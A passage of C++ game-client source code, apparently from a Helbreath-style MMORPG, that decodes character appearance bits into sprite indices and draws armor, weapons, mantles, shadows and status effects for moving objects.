		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
		else return FALSE;
	}
	cDir = _tmp_cDir;
	switch (_tmp_cDir) {
	case 1: _tmp_cDir = 5; break;
	case 2: _tmp_cDir = 6; break;
	case 3: _tmp_cDir = 7; break;
	case 4: _tmp_cDir = 8; break;
	case 5: _tmp_cDir = 1; break;
	case 6: _tmp_cDir = 2; break;
	case 7: _tmp_cDir = 3; break;
	case 8: _tmp_cDir = 4; break;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (10 * 8);
		iUndiesIndex    = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 10;
		iHairIndex      = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 10;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 10;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 10;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 10;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 10;
		if ((_tmp_sAppr2 & 0x000F) == 0)
			iShieldIndex = -1;
		else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 5;
		if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
			iWeaponIndex = -1;
		else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*5 + (_tmp_cDir - 1);
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 10;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 10;
		break;
	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (10 * 8);
		iUndiesIndex    = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 10;
		iHairIndex      = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 10;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 10;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 10;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 10;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 10;
		if ((_tmp_sAppr2 & 0x000F) == 0)
			iShieldIndex = -1;
		else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 5;
		if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
			iWeaponIndex = -1;
		else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*5 + (_tmp_cDir - 1);
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 10;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 10;
		break;
	default:
		if (_tmp_sOwnerType == 66)      iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		else if (_tmp_sOwnerType == 73) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		else if (_tmp_sOwnerType == 86) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
		else if (_tmp_sOwnerType == 87) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);// Ne devrait pas arriver!
		else if (_tmp_sOwnerType == 89) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);// Ne devrait pas arriver!
		else iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iArmArmorIndex  = -1;
		iBodyArmorIndex = -1;
		iPantsIndex     = -1;
		iBootsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	dx = 0;
	dy = 0;
	switch (_tmp_cDir) {
	case 1 : dy = 28 - (_tmp_cFrame<<2); break;
	case 2 : dy = 28 - (_tmp_cFrame<<2); dx = (_tmp_cFrame<<2) - 28; break;
	case 3 : dx = (_tmp_cFrame<<2) - 28; break;
	case 4 : dx = (_tmp_cFrame<<2) - 28; dy = (_tmp_cFrame<<2) - 28; break;
	case 5 : dy = (_tmp_cFrame<<2) - 28; break;
	case 6 : dy = (_tmp_cFrame<<2) - 28; dx = 28 - (_tmp_cFrame<<2); break;
	case 7 : dx = 28 - (_tmp_cFrame<<2); break;
	case 8 : dx = 28 - (_tmp_cFrame<<2); dy = 28 - (_tmp_cFrame<<2); break;
	}
	cFrame = _tmp_cFrame;
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX+dx, sY+dy, cFrame);
	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX+dx, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX+dy, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX+dx, sY+dy, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{	if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
					m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, cFrame, dwTime);
				else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy,  cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}
			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, cFrame, dwTime);
				}
				break;
			}

			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, cFrame, dwTime);
			else {
				if ((_tmp_iStatus & 0x40) != 0)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1)
			{	if (iPantsColor == 0)
					m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1)
			{	if (iArmColor == 0)
					m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1)
			{	if (iArmorColor == 0)
					m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1) {
				if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13+dx, sY -34+dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 4 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 4 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}
		}else
		{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, cFrame, dwTime);
			else {
				if ((_tmp_iStatus & 0x40) != 0)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1)
			{	if (iPantsColor == 0)
					m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1)
			{	if (iArmColor == 0)
					m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0)) {
				if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1)
			{	if (iArmorColor == 0)
					m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1)
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13+dx, sY -34+dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 4 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 4 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
					m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, cFrame, dwTime);
				else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy, cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
		}	}	}

		if ((_tmp_iStatus & 0x20) != 0) 	// Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX+dx, sY+dy, cFrame, 0, -5, -5, dwTime);
		DrawAngel(16+(_tmp_cDir - 1), sX+dx+20, sY+dy-20, cFrame%4, dwTime);
		DrawWanted(sX + dx, sY + dy, dwTime);
		CheckActiveAura2(sX+dx, sY+dy, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX + dx, sY + dy, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX + dx, sY + dy, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX + dx, sY + dy, _tmp_sOwnerType, _tmp_iStatus);
    }    }
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX+dx;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY+dy;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	_tmp_dx = dx;
	_tmp_dy = dy;
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

BOOL CGame::DrawObject_OnMove_ForMenu(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{short dx, dy;
 int iBodyIndex, iHairIndex, iUndiesIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iShieldIndex, iAdd, iMantleIndex;
 BOOL bInv = FALSE;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
	iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
	iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
	iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
	iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
	iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
	iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
	iHelmColor   = (_tmp_iApprColor & 0x0000000F);

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iAdd = 3;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else
				{	iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
				}
			}else iBodyArmorIndex = -1;
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;

			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
